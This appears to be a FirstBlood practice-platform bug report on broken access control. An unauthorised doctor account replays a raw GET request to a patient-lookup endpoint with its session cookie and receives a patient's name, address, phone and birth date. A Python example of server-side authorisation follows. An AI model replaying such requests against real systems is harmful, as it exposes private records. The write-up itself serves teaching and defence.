FirstBlood-#197 Application Logic Issue allowing a doctor who is not authorised to view patients' information on the dashboard


On 2021-05-11, c3phas reported:

Summary

Hi, I found another issue similar to a previous issue I reported, which allows an unauthorised doctor to view patients' information.

On the doctors' dashboard there is a feed showing some activities, and when we click on the patient's name we get an alert saying we do not have authorization to view the patient's information.

Description

We can inspect the source code and note the JavaScript that performs the GET request.

The endpoint being hit when we click on the patient's name is revealed in the JavaScript file on viewing the source code. Note the endpoint /drapi/query.php?aptid.

function getinfo(aptID) {
    // Fetch the appointment record for the clicked patient from the doctor API.
    var xhr = new XMLHttpRequest();
    // Relative URL: from /drpanel/index.php this resolves to /drpanel/drapi/query.php
    xhr.open("GET", 'drapi/query.php?aptid=' + aptID, true);

    xhr.onreadystatechange = function() {
        // Show whatever the server returned once the request completes with HTTP 200.
        if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
            alert(this.responseText);
        }
    };

    xhr.send();
}

We can use the endpoint to craft a GET request with the cookies belonging to a non-admin account:

GET /drpanel/drapi/query.php?aptid=56911019 HTTP/1.1
Host: firstbloodhackers.com:49513
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: */*
Referer: http://firstbloodhackers.com:49513/drpanel/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: drps=8291dbc4c62e41b45007dfbbb
Connection: close

Note: the cookie above belongs to an account without permission to view patients' information.

The above GET request returns the following response:

Name: Melissa White
Address: St. Johns Hall, Breck Rd, Poulton-Le-Fylde, FY6 7HT
Telephone: 07796 985353
DOB: 02/01/1992

Supporting Material

Impact

Doctors with no rights to access patients' information can gain access to that information.

P1 CRITICAL

Endpoint: /drpanel/drapi/query.php

Parameter: N/A

Payload: N/A


FirstBlood ID: 11
Vulnerability Type: Application/Business Logic

Administrator endpoints can be accessed by non-privileged doctor accounts, which reveals sensitive patient information.
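The root cause described in this report is an endpoint that only checks that the caller is logged in (authentication) and never checks whether the caller is allowed to see patient records (authorisation), so a client-side alert is the only thing standing between a doctor account and the data. The following is an added example, not code from the FirstBlood application or from the report: a minimal model of the query endpoint in its vulnerable form next to a hardened form that makes the decision server-side from the session. The session table, the usernames (drjones, admin), the second cookie value and the role-to-permission mapping are constructed stand-ins; the appointment ID, the non-privileged cookie value and the patient record are the ones shown in the report above.

```python
"""Added example (not FirstBlood's code): server-side authorisation for a
patient lookup endpoint such as /drpanel/drapi/query.php?aptid=...

query_vulnerable() reproduces the reported behaviour: any valid session gets
the record.  query_hardened() adds a deny-by-default permission check."""

from dataclasses import dataclass
from http.cookies import SimpleCookie

# Constructed session table: drps cookie value -> username (hypothetical accounts).
SESSIONS = {
    "8291dbc4c62e41b45007dfbbb": "drjones",  # the non-privileged doctor session from the report
    "d4c1a9f0e2b7c6a5f3e8d9b0a": "admin",    # an administrator session (constructed)
}

# Constructed role assignments and the permissions each role carries.
ACCOUNT_ROLES = {"drjones": "doctor", "admin": "admin"}
ROLE_PERMISSIONS = {"admin": {"view_patient"}, "doctor": set()}

# Appointment record returned by the endpoint (values as printed in the report).
APPOINTMENTS = {
    56911019: {
        "Name": "Melissa White",
        "Address": "St. Johns Hall, Breck Rd, Poulton-Le-Fylde, FY6 7HT",
        "Telephone": "07796 985353",
        "DOB": "02/01/1992",
    }
}


@dataclass
class Response:
    status: int
    body: str


def session_user(cookie_header: str):
    """Resolve the drps session cookie to a username, or None when not logged in."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get("drps")
    return SESSIONS.get(morsel.value) if morsel else None


def has_permission(user: str, perm: str) -> bool:
    """Deny by default: an unknown account or role carries no permissions."""
    role = ACCOUNT_ROLES.get(user)
    return perm in ROLE_PERMISSIONS.get(role, set())


def render(record: dict) -> str:
    """Format the record the way the report shows it: one 'Key: value' per line."""
    return "\n".join(f"{k}: {v}" for k, v in record.items())


def _fetch(aptid: str) -> Response:
    """Shared record lookup; validates the aptid parameter before using it."""
    if not aptid.isdigit():
        return Response(400, "Bad appointment id")
    record = APPOINTMENTS.get(int(aptid))
    if record is None:
        return Response(404, "No such appointment")
    return Response(200, render(record))


def query_vulnerable(aptid: str, cookie_header: str) -> Response:
    """Authentication only: every logged-in doctor gets the record (the reported bug)."""
    if session_user(cookie_header) is None:
        return Response(401, "Not logged in")
    return _fetch(aptid)


def query_hardened(aptid: str, cookie_header: str) -> Response:
    """Authentication plus a server-side authorisation check on the caller's role."""
    user = session_user(cookie_header)
    if user is None:
        return Response(401, "Not logged in")
    if not has_permission(user, "view_patient"):
        return Response(403, "You do not have authorization to view patient information")
    return _fetch(aptid)


if __name__ == "__main__":
    doctor_cookie = "drps=8291dbc4c62e41b45007dfbbb"
    for name, handler in (("vulnerable", query_vulnerable), ("hardened", query_hardened)):
        r = handler("56911019", doctor_cookie)
        print(f"{name}: HTTP {r.status}\n{r.body}\n")
```

Whether the real endpoint should be restricted to administrators or to the doctors assigned to an appointment is an application decision; the point is that the decision is taken on the server from the session, so replaying the request with a low-privilege cookie, as the report does, yields 403 instead of the record.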


Respect Earnt: 2000000